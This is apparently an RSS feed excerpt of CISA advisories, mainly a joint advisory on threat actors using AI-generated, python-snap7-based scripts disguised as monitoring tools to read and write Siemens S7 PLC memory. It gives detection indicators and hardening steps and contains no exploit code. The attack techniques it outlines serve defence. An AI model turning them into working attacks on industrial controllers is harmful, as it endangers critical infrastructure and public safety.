&lt;p&gt;In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization&#039;s security program against the threat behaviors mapped to the MITRE ATT&amp;amp;CK Matrix for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&amp;amp;CK techniques described in this advisory.&lt;/p&gt;
&lt;p&gt;To get started:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Select an ATT&amp;amp;CK technique described in this advisory (see &lt;a href=&quot;#Table2&quot;&gt;&lt;strong&gt;Table 2&lt;/strong&gt;&lt;/a&gt; to &lt;a href=&quot;#Table11&quot;&gt;&lt;strong&gt;Table 11&lt;/strong&gt;&lt;/a&gt;).&lt;/li&gt;
&lt;li&gt;Align your security technologies against the technique.&lt;/li&gt;
&lt;li&gt;Test your technologies against the technique.&lt;/li&gt;
&lt;li&gt;Analyze your detection and prevention technologies’ performance.&lt;/li&gt;
&lt;li&gt;Repeat the process for all security technologies to obtain a set of comprehensive performance data.&lt;/li&gt;
&lt;li&gt;Tune your security program, including people, processes, and technologies, based on the data generated by this process.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;amp;CK techniques identified in this advisory.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Resources&lt;/strong&gt;&lt;/h2&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;Microsoft: &lt;a href=&quot;https://learn.microsoft.com/en-us/entra/identity/devices/concept-primary-refresh-token?tabs=windows-prt-issued%2Cbrowser-behavior-windows%2Cwindows-prt-used%2Cwindows-prt-renewal%2Cwindows-prt-protection%2Cwindows-apptokens%2Cwindows-browsercookies%2Cwindows-mfa&quot; target=&quot;_blank&quot; title=&quot;Understanding primary refresh token (PRT)&quot;&gt;Understanding primary refresh token (PRT)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;SpecterOps: &lt;a href=&quot;https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf&quot; target=&quot;_blank&quot; title=&quot;Certified pre-owned: Abusing Active Directory Certificate Services&quot;&gt;Certified pre-owned: Abusing Active Directory Certificate Services&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Contact Information&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA via CISA’s 24/7 Operations Center at &lt;a href=&quot;mailto:contact@cisa.dhs.gov&quot;&gt;contact@cisa.dhs.gov&lt;/a&gt; or 1-844-Say-CISA (1-844-729-2472). When available, please include the following information regarding the incident:&lt;/p&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;Date, time, and location of the incident;&lt;/li&gt;
&lt;li&gt;Type of activity;&lt;/li&gt;
&lt;li&gt;Number of people affected;&lt;/li&gt;
&lt;li&gt;Type of equipment used for the activity; and&lt;/li&gt;
&lt;li&gt;Name of the submitting company or organization, and a designated point of contact.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Disclaimer&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Version History&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;August 25, 2026&lt;/strong&gt;: Initial version.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Notes&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note1&quot;&gt;&lt;sup&gt;1&lt;/sup&gt;&lt;/a&gt; “SpecterOps&amp;nbsp;/ Bloodhound,” GitHub, last modified July 15, 2026, &lt;a href=&quot;https://github.com/SpecterOps/BloodHound&quot; target=&quot;_blank&quot;&gt;https://github.com/SpecterOps/BloodHound&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note2&quot;&gt;&lt;sup&gt;2&lt;/sup&gt;&lt;/a&gt; “SpecterOps&amp;nbsp;/&amp;nbsp;AzureHound,” GitHub, last modified June 4, 2026, &lt;a href=&quot;https://github.com/SpecterOps/AzureHound&quot; target=&quot;_blank&quot;&gt;https://github.com/SpecterOps/AzureHound&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note3&quot;&gt;&lt;sup&gt;3&lt;/sup&gt;&lt;/a&gt; “ROADrecon,” GitHub, &lt;a href=&quot;https://github.com/dirkjanm/ROADtools/tree/master/roadrecon&quot; target=&quot;_blank&quot;&gt;https://github.com/dirkjanm/ROADtools/tree/master/roadrecon&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Note4&quot;&gt;&lt;sup&gt;4&lt;/sup&gt;&lt;/a&gt; “dirkjanm/adconnectdumb,” GitHub, last modified August 25, 2026, &lt;a href=&quot;https://github.com/dirkjanm/adconnectdump&quot; target=&quot;_blank&quot;&gt;https://github.com/dirkjanm/adconnectdump&lt;/a&gt;.&lt;/p&gt;
</description>
  <pubDate>Thu, 20 Aug 2026 12:32:14 EDT</pubDate>
    <dc:creator>CISA</dc:creator>
    <guid isPermaLink="false">/node/25334</guid>
    </item>
<item>
  <title>Defending Against an Active Threat to Siemens S7 Series PLCs</title>
  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-231a</link>
  <description>&lt;h2&gt;&lt;strong&gt;Executive summary&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Note:&lt;/strong&gt; This advisory relates to an active threat to Siemens S7 Series programmable logic controllers (PLCs). However, ongoing PLC targeting activity is broader than Siemens PLCs. All PLC owners and operators should apply relevant mitigations to reduce the risk to their devices and systems. The Siemens-specific content in this advisory should be understood and applied as one subset of the wider threat landscape.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Top Mitigations&lt;/strong&gt;&lt;/p&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;strong&gt;Inventory&amp;nbsp;&lt;/strong&gt;all Siemens S7 Series programmable logic controllers (PLCs)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Apply&amp;nbsp;&lt;/strong&gt;critical security patches&lt;strong&gt;&amp;nbsp;&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Ensure&amp;nbsp;&lt;/strong&gt;PLCs are &lt;strong&gt;not&amp;nbsp;&lt;/strong&gt;accessible&lt;strong&gt;&amp;nbsp;&lt;/strong&gt;from the Internet&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Strengthen&amp;nbsp;&lt;/strong&gt;access controls&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Monitor&amp;nbsp;&lt;/strong&gt;for unauthorized activity&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Harden&amp;nbsp;&lt;/strong&gt;PLC services, protocols, and ladder logic integrity&lt;strong&gt;&amp;nbsp;&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Hunt&amp;nbsp;&lt;/strong&gt;for anomalies that may indicate a compromise&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Department of Energy (DOE), and Environmental Protection Agency (EPA)—hereafter referred to as the authoring agencies—are releasing this Cybersecurity Advisory to warn owners and operators of industrial control systems (ICSs) of an active cyber threat to Siemens S7 Series PLCs and provide relevant mitigations to protect and defend them.&amp;nbsp;&lt;/p&gt;
&lt;p&gt;The threat actors are conducting reconnaissance and capability development against U.S.-based Siemens PLC installations using AI-generated exploitation scripts disguised as legitimate monitoring tools. The actors leverage Internet scanning services to find Internet-exposed PLCs running outdated software or that are otherwise poorly protected. The U.S. critical infrastructure sectors most targeted by this threat activity include &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/critical-manufacturing-sector&quot;&gt;Critical Manufacturing&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector&quot;&gt;Energy&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/water-and-wastewater-sector&quot;&gt;Water and Wastewater&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/chemical-sector&quot;&gt;Chemical&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/food-and-agriculture-sector&quot;&gt;Food and Agriculture&lt;/a&gt;, and &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/commercial-facilities-sector&quot;&gt;Commercial Facilities&lt;/a&gt;. This is not a theoretical risk—it is an active threat. Depending on the specific circumstances, exploitation of poorly protected PLCs&amp;nbsp;could lead to disruption of critical industrial processes, safety incidents, downtime or equipment damage, compromise of sensitive data, compliance violations, and cascading impacts across interconnected systems.&amp;nbsp;&lt;/p&gt;
&lt;p&gt;The authoring agencies urge all owners and operators of operational technology (OT) systems using Siemens S7 Series and other PLC devices to proactively check their systems:&lt;/p&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;are properly protected with all applicable security patches and updates,&amp;nbsp;&lt;/li&gt;
&lt;li&gt;are isolated from the Internet wherever possible,&amp;nbsp;&lt;/li&gt;
&lt;li&gt;have strong access controls, and&amp;nbsp;&lt;/li&gt;
&lt;li&gt;employ security tooling to monitor ICS environments for anomalous or malicious activity.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These mitigations are particularly important for owners and operators who work with third-party service providers or system integrators who may have remote access to PLCs, as the asset owners may not realize that their systems are exposed and at risk.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Technical details&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt;&amp;nbsp;This advisory uses the &lt;a href=&quot;https://attack.mitre.org/versions/v19/matrices/ics/&quot; target=&quot;_blank&quot;&gt;MITRE ATT&amp;amp;CK&lt;sup&gt;®&lt;/sup&gt;&amp;nbsp;Matrix for ICS&lt;/a&gt;&lt;a href=&quot;#Note1&quot;&gt;&lt;strong&gt;&lt;sup&gt;1&lt;/sup&gt;&lt;/strong&gt;&lt;/a&gt; framework, version 19, and the&amp;nbsp;&lt;a href=&quot;https://attack.mitre.org/versions/v19/matrices/enterprise/&quot; target=&quot;_blank&quot; title=&quot;MITRE ATTACK Matrix for Enterprise&quot;&gt;MITRE ATT&amp;amp;CK&amp;nbsp;Matrix for Enterprise&lt;/a&gt;&amp;nbsp;framework, version 19.&amp;nbsp;This advisory also uses &lt;a href=&quot;https://d3fend.mitre.org/&quot; target=&quot;_blank&quot;&gt;MITRE D3FEND&lt;sup&gt;TM&lt;/sup&gt;&lt;/a&gt;, version 1.5.0. See &lt;a href=&quot;#AppA&quot;&gt;&lt;strong&gt;Appendix A&lt;/strong&gt;&lt;/a&gt; and &lt;a href=&quot;#AppB&quot;&gt;&lt;strong&gt;Appendix B&lt;/strong&gt;&lt;/a&gt; for tables of the activity mapped to MITRE ATT&amp;amp;CK and MITRE D3FEND tactics, techniques, and countermeasures.&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Threat actor targeting&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;Threat actors are actively targeting the following Siemens PLC models:&lt;/p&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;strong&gt;S7-200 Series&lt;/strong&gt;&amp;nbsp;(all CPU variants)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;S7-300 Series&lt;/strong&gt;&amp;nbsp;(all CPU variants including 314, 315, 317 models)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;S7-400 Series&lt;/strong&gt;&amp;nbsp;(all CPU variants)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;S7-1200 Series&lt;/strong&gt;&amp;nbsp;(CPU 1211C, 1212C, 1214C, 1215C, 1217C variants)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;S7-1500 Series&lt;/strong&gt;&amp;nbsp;(all CPU variants, including F-series safety controllers)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Threat actors are using AI assistance to generate exploitation scripts using publicly available information on these Siemens S7 Series PLCs for initial access, credential access, denial of service, and other objectives. If these PLCs are exposed to the Internet or insufficiently segmented, then threat actors can exploit various critical and high severity known vulnerabilities in these PLCs.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt;&amp;nbsp;Using AI to generate exploitation scripts represents an evolution in threat actor capabilities, dramatically reducing the technical expertise and time required to develop working ICS exploitation scripts and malicious tools. In addition, AI enables adversaries to rapidly leverage additional attack vectors and adapt to defensive measures. Threat actors can easily collect public information about vulnerabilities and weaknesses, find exposed and exploitable PLCs, and use AI-generated scripts to act on that information. If PLCs are exposed to the Internet, they are at high risk for exploitation.&amp;nbsp;&lt;/p&gt;
&lt;p&gt;Threat actors are leveraging open source industrial automation libraries—specifically &lt;code&gt;snap7.dll&lt;/code&gt;/&lt;code&gt;python-snap7&lt;/code&gt;—combined with AI-assisted scripting to create custom tools that mimic legitimate OT monitoring solutions. These tools provide read/write access to Siemens S7 Series PLC memory, configuration data, and ladder logic programs via the S7comm protocol.&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Threat actor techniques&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;Threat actors are:&lt;/p&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;strong&gt;Using Internet scanning services&lt;/strong&gt;&amp;nbsp;(e.g., Censys, ZoomEye) to identify Internet-exposed or insufficiently segmented Siemens S7 Series PLCs [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1596/005/&quot; target=&quot;_blank&quot;&gt;T1596.005&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Rapidly iterating exploit code&lt;/strong&gt;&amp;nbsp;through AI-assisted development, lowering technical barriers to ICS attacks [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1587/004/&quot; target=&quot;_blank&quot;&gt;T1587.004&lt;/a&gt;, &lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1588/007/&quot; target=&quot;_blank&quot;&gt;T1588.007&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Taking advantage of insecure credentials&lt;/strong&gt; to access exposed devices that have unconfigured (default) or minimally configured authentication [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1694/&quot; target=&quot;_blank&quot;&gt;T1694&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Deploying AI-generated Python scripts&lt;/strong&gt;&amp;nbsp;that incorporate the &lt;code&gt;snap7.dll&lt;/code&gt; library from public repositories [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T0834/&quot; target=&quot;_blank&quot;&gt;T0834&lt;/a&gt;] to gain read/write access to the PLC and mimic legitimate tools&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Masquerading malicious scripts as legitimate monitoring tools&lt;/strong&gt;&amp;nbsp;to evade detection by security teams [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T0849/&quot; target=&quot;_blank&quot;&gt;T0849&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Conducting read/write operations&lt;/strong&gt;&amp;nbsp;on data blocks, potentially for reconnaissance, capability testing, or pre-positioning for effects operations [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T0893/&quot; target=&quot;_blank&quot;&gt;T0893&lt;/a&gt;, &lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T0821/&quot; target=&quot;_blank&quot;&gt;T0821&lt;/a&gt;]&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The authoring agencies assess this activity pattern is likely intended as persistent reconnaissance in targeted sectors and facilities to develop capabilities and prepare to cause operational effects against critical infrastructure. For capability development, actors are testing and refining their exploitation techniques against specific PLC models to improve their ability to compromise the PLCs. To prepare for operational effects, actors are leveraging read access to understand target environments, enabling preparation and positioning for future write operations to cause disruption or other operational impacts.&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Potential operational impacts&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;The U.S. critical infrastructure sectors most targeted by this threat activity include &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/critical-manufacturing-sector&quot;&gt;Critical Manufacturing&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector&quot;&gt;Energy&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/water-and-wastewater-sector&quot;&gt;Water and Wastewater&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/chemical-sector&quot;&gt;Chemical&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/food-and-agriculture-sector&quot;&gt;Food and Agriculture&lt;/a&gt;, and &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/commercial-facilities-sector&quot;&gt;Commercial Facilities&lt;/a&gt;. Additionally, Siemens S7 Series PLCs are used in other sectors, including the &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/defense-industrial-base-sector&quot;&gt;Defense Industrial Base (DIB)&lt;/a&gt;, and could be targeted there as well. Unauthorized access to PLCs could result in:&lt;/p&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;strong&gt;Disruption of critical industrial processes&lt;/strong&gt;&amp;nbsp;affecting production throughput, product quality, and public services&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Safety incidents affecting personnel&lt;/strong&gt;&amp;nbsp;through manipulation of safety interlocks, emergency shutdown systems, or process parameters&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Equipment damage and extended operational downtime&lt;/strong&gt;&amp;nbsp;from process upsets, improper sequencing, or forced equipment operation outside design parameters&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Compromise of sensitive operational data&lt;/strong&gt;,&amp;nbsp;including proprietary process recipes, control strategies, and facility configurations&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cascading impacts across interconnected systems&lt;/strong&gt;&amp;nbsp;affecting supply chains, dependent facilities, and integrated business operations&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Regulatory compliance violations&lt;/strong&gt;&amp;nbsp;and potential liability from process safety management failures&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Mitigation actions&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Since threat actors are developing capabilities using AI to compromise PLCs using known vulnerabilities, misconfigurations, and other weaknesses and then may use compromised PLCs to interfere with normal operations, the authoring agencies urge organizations to implement comprehensive defense-in-depth strategies, in addition to Common Vulnerabilities and Exposures (CVE) remediation, to protect and defend their PLCs.&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Detection opportunities&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;Organizations should implement detection strategies and hunt for anomalies that may indicate a compromise, focusing on [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/&quot; target=&quot;_blank&quot;&gt;D3-PM&lt;/a&gt;]:&lt;/p&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;strong&gt;Anomalous S7comm behavior:&lt;/strong&gt;&amp;nbsp;Connections from non-engineering workstations, unusual data block access patterns, or write operations outside change windows&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reconnaissance indicators:&lt;/strong&gt;&amp;nbsp;Sequential IP scanning on port &lt;code&gt;102&lt;/code&gt;, repeated connection attempts with varying parameters, or enumeration of CPU properties&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Tool artifacts:&lt;/strong&gt;&amp;nbsp;&lt;code&gt;Snap7.dll&lt;/code&gt; library usage outside approved engineering workstations, Python scripts with S7comm functionality, or unauthorized monitoring software installations&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Temporal anomalies:&lt;/strong&gt;&amp;nbsp;S7comm activity during off-hours, unexpected connection patterns consistent with automated scripting rather than human operators, or configuration changes without corresponding work orders or change tickets&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Geographic anomalies:&lt;/strong&gt;&amp;nbsp;Connections originating from unexpected countries or IP ranges not associated with vendors or integrators&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Preventative hardening actions&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;To counter threats to PLCs, the authoring agencies recommend all PLC owners and operators follow the mitigations in joint guidance &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/primary-mitigations-reduce-cyber-threats-operational-technology&quot;&gt;Primary Mitigations to Reduce Cyber Threats to Operational Technology&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To harden Siemens S7 Series PLCs, the authoring agencies strongly urge all owners implement the hardening steps below. Entities that rely on systems integrators or third-party managed service providers should share this advisory with those parties and request implementation of the following mitigations:&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;1. Conduct an immediate inventory of all Siemens S7 Series PLCs in your environment [&lt;/strong&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:HardwareComponentInventory/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;D3-HCI&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;]:&lt;/strong&gt;&lt;/h4&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Verify current firmware versions for all S7-200, S7-300, S7-400, S7-1200, and S7-1500 controllers against backup gold copy&lt;/li&gt;
&lt;li&gt;Identify any systems directly or indirectly accessible from untrusted networks&lt;/li&gt;
&lt;li&gt;Map all engineering workstations with Totally Integrated Automation (TIA) Portal, STEP 7, or S7 programming access&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;2. Apply critical security patches as soon as possible [&lt;/strong&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:SoftwareUpdate/&quot;&gt;&lt;strong&gt;D3-SU&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;]:&lt;/strong&gt;&lt;/h4&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Update Siemens S7 Series PLC firmware to the latest versions that address known vulnerabilities&lt;/li&gt;
&lt;li&gt;Prioritize Internet-facing or demilitarized zone (DMZ)-resident controllers&lt;/li&gt;
&lt;li&gt;Update TIA Portal and STEP 7 software to current versions&lt;/li&gt;
&lt;li&gt;Consult &lt;a href=&quot;https://www.siemens.com/en-us/content/cert-services/#6cOXgBJ3xa94mcOefayaUh&quot; target=&quot;_blank&quot;&gt;Siemens ProductCERT advisories&lt;/a&gt; for information on known vulnerabilities, along with relevant workarounds and mitigations&lt;/li&gt;
&lt;li&gt;Test all updates in a development environment before production deployment&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;3. Verify network segmentation and ensure PLCs are NOT accessible from the Internet [&lt;/strong&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:NetworkIsolation/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;D3-NI&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;]:&lt;/strong&gt;&lt;/h4&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Audit firewall rules for any exposed S7comm services (Transmission Control Protocol [TCP] port &lt;code&gt;102&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Block TCP port &lt;code&gt;102&lt;/code&gt; at perimeter firewalls entirely&lt;/li&gt;
&lt;li&gt;Implement a DMZ architecture that separates OT and IT networks&lt;/li&gt;
&lt;li&gt;Deploy unidirectional gateways for data historian connections where appropriate&lt;/li&gt;
&lt;li&gt;Verify there is no unauthorized routing between corporate and industrial networks&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;4. Review and strengthen access controls [&lt;/strong&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:NetworkAccessMediation/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;D3-NAM&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;, &lt;/strong&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:CredentialHardening/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;D3-CH&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;]:&lt;/strong&gt;&lt;/h4&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Restrict TIA Portal/STEP 7 access to authorized engineering workstations only by MAC/IP allowlisting on PLCs&lt;/li&gt;
&lt;li&gt;Enable PLC password protection on all Siemens S7 Series controllers&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Configure protection levels (such as write protection and read/write protection) on Siemens S7 Series devices&lt;/li&gt;
&lt;li&gt;Remove or change default SNMP community strings&lt;/li&gt;
&lt;li&gt;Implement application allowlisting on all engineering workstations&lt;/li&gt;
&lt;li&gt;Enable multi-factor authentication for all remote access to OT networks&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;5. Enable comprehensive logging and monitoring [&lt;/strong&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;D3-PM&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;, &lt;/strong&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;D3-NTA&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;]:&lt;/strong&gt;&lt;/h4&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Deploy ICS-aware intrusion detection&amp;nbsp;(e.g., Claroty, Dragos Platform, Nozomi Networks, or similar)&lt;/li&gt;
&lt;li&gt;Monitor all S7comm traffic on TCP port &lt;code&gt;102&lt;/code&gt;&amp;nbsp;for connections outside maintenance windows&lt;/li&gt;
&lt;li&gt;Alert on unauthorized PUT/GET operations, especially write commands to data blocks or configuration areas of memory&lt;/li&gt;
&lt;li&gt;Log all TIA Portal/STEP 7 connections to PLCs with timestamps and source IPs&lt;/li&gt;
&lt;li&gt;Establish a baseline for legitimate behavior and configure monitoring tools to alert on deviations&lt;/li&gt;
&lt;li&gt;Monitor for Python processes with &lt;code&gt;snap7.dll&lt;/code&gt; library imports on engineering workstations&lt;/li&gt;
&lt;li&gt;Watch for sequential IP scanning patterns or block reads of configuration data&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;6. Implement S7-specific hardening measures [&lt;/strong&gt;&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;D3-ACH&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;]:&lt;/strong&gt;&lt;/h4&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Disable web servers on Siemens S7 Series devices if not operationally required&lt;/li&gt;
&lt;li&gt;Disable unused communication protocols (such as Modbus TCP and PROFINET, if they are not required)&lt;/li&gt;
&lt;li&gt;Configure connection resources to limit simultaneous S7comm sessions&lt;/li&gt;
&lt;li&gt;Enable TIA Portal/STEP 7 “complete restart protection” and “know-how protection” features where available&lt;/li&gt;
&lt;li&gt;Evaluate for ladder logic changes in online/offline modes&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;7. Contact Siemens for model-specific guidance:&lt;/strong&gt;&lt;/h4&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Engage Siemens Technical Support for hardening recommendations specific to your CPU models and firmware versions&lt;/li&gt;
&lt;li&gt;Verify patch compatibility with your specific operational environment and third-party integrations&lt;/li&gt;
&lt;li&gt;Request assistance with protection level configuration and access control implementation&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;There is an active threat targeting Internet-exposed Siemens S7 Series PLCs. The combination of known vulnerabilities, accessible exploitation libraries, and AI-assisted development creates a high-probability attack scenario against inadequately protected PLC installations. Organizations should treat this Cybersecurity Advisory with urgency and coordinate response efforts across security, engineering, executive leadership, plant operations, and vendor support teams to implement the recommended detection and hardening actions.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Resources&lt;/strong&gt;&lt;/h2&gt;
&lt;ul&gt;
